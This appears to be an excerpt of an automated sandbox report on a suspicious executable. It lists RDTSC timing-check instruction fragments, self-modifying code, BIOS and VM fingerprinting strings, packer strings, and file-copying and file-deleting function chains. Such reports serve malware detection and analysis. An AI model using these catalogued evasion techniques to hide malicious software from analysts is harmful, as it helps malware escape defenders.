                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55BBBC second address: 55BBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5652BE second address: 5652C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5652C4 second address: 5652C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5652C8 second address: 5652E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95D47CFB30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5652E2 second address: 5652E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D28 second address: 564D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D2C second address: 564D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D32 second address: 564D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D3C second address: 564D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D46 second address: 564D50 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95D47CFB26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D50 second address: 564D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F95D5269628h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F95D526962Eh 0x00000015 jo 00007F95D5269628h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D77 second address: 564D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F95D47CFB26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564D83 second address: 564D8D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95D5269626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572C04 second address: 572C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572C12 second address: 572C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 574B88 second address: 574BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB38h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95D47CFB38h 0x00000015 jl 00007F95D47CFB26h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 574BC9 second address: 574BDC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D5269626h 0x00000008 jnp 00007F95D5269626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5746C9 second address: 5746CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576237 second address: 57623D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57623D second address: 576243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576243 second address: 576248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578CC5 second address: 578CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578CCB second address: 578CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578754 second address: 578764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5788A1 second address: 5788D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269635h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95D526962Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5788D1 second address: 5788D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5788D5 second address: 5788DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5788DB second address: 5788E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57F906 second address: 57F90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57F90A second address: 57F93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F95D47CFB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F95D47CFB36h 0x00000012 jmp 00007F95D47CFB2Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5877BF second address: 5877C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587646 second address: 58764F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59416D second address: 594180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 592ECC second address: 592ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593486 second address: 59348C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59348C second address: 5934B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB38h 0x00000007 jmp 00007F95D47CFB2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597CAA second address: 597CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95D5269626h 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jg 00007F95D5269626h 0x00000018 popad 0x00000019 pushad 0x0000001a jo 00007F95D5269626h 0x00000020 pushad 0x00000021 popad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597CD3 second address: 597CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597867 second address: 59787D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59787D second address: 597885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597885 second address: 5978A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jp 00007F95D5269626h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B724 second address: 59B72A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B72A second address: 59B733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B733 second address: 59B74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F95D47CFB26h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95D47CFB2Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A22F8 second address: 5A22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A46C3 second address: 5A4730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F95D47CFB35h 0x0000000b jmp 00007F95D47CFB2Fh 0x00000010 jmp 00007F95D47CFB2Ch 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F95D47CFB37h 0x0000001d jmp 00007F95D47CFB2Eh 0x00000022 jnl 00007F95D47CFB26h 0x00000028 popad 0x00000029 jmp 00007F95D47CFB34h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B59AF second address: 5B59B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B59B4 second address: 5B59D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95D47CFB35h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B59D2 second address: 5B59D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B56B8 second address: 5B56C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F95D47CFB26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B56C7 second address: 5B56CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B56CB second address: 5B56E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B56E1 second address: 5B56E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C4F5E second address: 5C4F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jo 00007F95D47CFB28h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C585C second address: 5C5860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C5B18 second address: 5C5B20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C5B20 second address: 5C5B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F95D5269626h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C5C9E second address: 5C5CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8AB8 second address: 5C8AC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 ja 00007F95D526962Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8B4E second address: 5C8B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8E4E second address: 5C8E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8E6A second address: 5C8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8E71 second address: 5C8EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269634h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F95D5269628h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2DB2h], edx 0x0000002a push 00000004h 0x0000002c mov edx, dword ptr [ebp+122D2A9Ch] 0x00000032 call 00007F95D5269629h 0x00000037 jmp 00007F95D526962Ah 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F95D5269635h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8EE4 second address: 5C8EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8EE9 second address: 5C8F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007F95D5269626h 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C8F1B second address: 5C8F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C914E second address: 5C91A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F95D5269630h 0x0000000b jmp 00007F95D526962Dh 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dl, 9Fh 0x00000017 push dword ptr [ebp+122D33CBh] 0x0000001d mov dword ptr [ebp+122D18F1h], ebx 0x00000023 add dx, 8500h 0x00000028 push F742D463h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 jmp 00007F95D5269635h 0x00000035 pop eax 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C91A7 second address: 5C91AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC16E second address: 5CC172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC172 second address: 5CC180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F95D47CFB32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC180 second address: 5CC186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C102ED second address: 4C10345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F95D47CFB32h 0x0000000f jmp 00007F95D47CFB35h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F95D47CFB2Eh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F95D47CFB2Eh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C103F2 second address: 4C103F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C103F6 second address: 4C103FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C103FC second address: 4C10430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95D5269630h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95D526962Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C10430 second address: 4C10452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F95D47CFB2Bh 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9E59 second address: 4E9E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5668B4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_000E38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000E4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_000DDA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_000DE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_000DED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_000E4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000DDE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_000DBE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_000E3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000DF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000D16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000D1160 GetSystemInfo,ExitProcess, 0_2_000D1160
                Source: file.exe, file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2208889056.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware[
                Source: file.exe, 00000000.00000002.2208889056.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2208889056.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWj
                Source: file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13596
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13648
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13593
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13608
